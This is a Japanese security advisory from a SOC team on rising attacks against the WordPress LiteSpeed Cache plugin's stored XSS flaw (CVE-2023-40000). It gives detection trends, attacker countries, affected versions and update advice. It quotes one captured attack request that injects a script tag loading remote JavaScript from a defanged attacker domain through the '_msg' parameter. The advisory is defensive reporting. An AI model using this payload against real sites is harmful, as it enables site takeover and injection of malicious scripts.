本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。
WordPressのプラグイン「LiteSpeed Cache」の脆弱性(CVE-2023-40000)を狙った攻撃
今月は、WordPressのプラグイン「LiteSpeed Cache」の脆弱性(CVE-2023-40000)を狙った攻撃が増加しました。LiteSpeed Cacheは、Webページの読み込みを高速化するキャッシュプラグインで、多くのWordPressのサイトで使用されています。本脆弱性であるクロスサイトスクリプティングの脆弱性を悪用された場合、WordPressファイルやデータベースに不正なスクリプトを埋め込まれたり、管理者ユーザを作成されてしまう恐れがあります。
下図は、本脆弱性を狙った攻撃の検知数推移です。弊社SOCでは、5/21(火)以降に検知数が増加しました。当該製品を使用されている場合は、早急に最新のバージョンにアップデートすることをお勧めします。
 |
以下は、弊社SOCで検知した攻撃例です。入力サニタイジングと出力エスケープ処理に不備が存在する「_msg」パラメータに対して不正なスクリプトを指定してクロスサイトスクリプティングを試みた通信となっています。なお、ペイロード内のドメインは、安全のためエスケープ処理して記載しています。
| POST /wp-json/litespeed/v1/cdn_status HTTP/1.1 Host: www.example.com User-Agent: Searcherxweb success=0&result[_msg]=<script src=https://zeroday2024[.]com/admin-bar-reloaded[.]min[.]js></script> |
下表は、本脆弱性を狙った攻撃元国です。オランダとスイスからの攻撃を多数観測しています。
| # | 2024年5月 | |
| 1 | オランダ | 56.3% |
| 2 | スイス | 40.8% |
| 3 | マレーシア | 1.3% |
| 4 | アメリカ | 0.7% |
| 5 | ロシア | 0.2% |
影響対象
- LiteSpeed Cache 5.7.0.1 未満
対策方法
最新のバージョンにアップデートしてください。
参考情報
- LiteSpeed Cache < 5.7.0.1 - Unauthenticated Stored XSS
https://wpscan.com/vulnerability/dd9054cc-1259-427d-a4ad-1875b7b2b3b4/ - WordPress Sites Under Widespread Attack – LiteSpeed Cache Plugin Exploit Puts Millions at Risk
https://securityonline.info/wordpress-sites-under-widespread-attack-litespeed-cache-plugin-exploit-puts-millions-at-risk/ - CVE-2023-40000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40000
マネージドサービス事業部
MBSD-SOC
MBSD-SOC
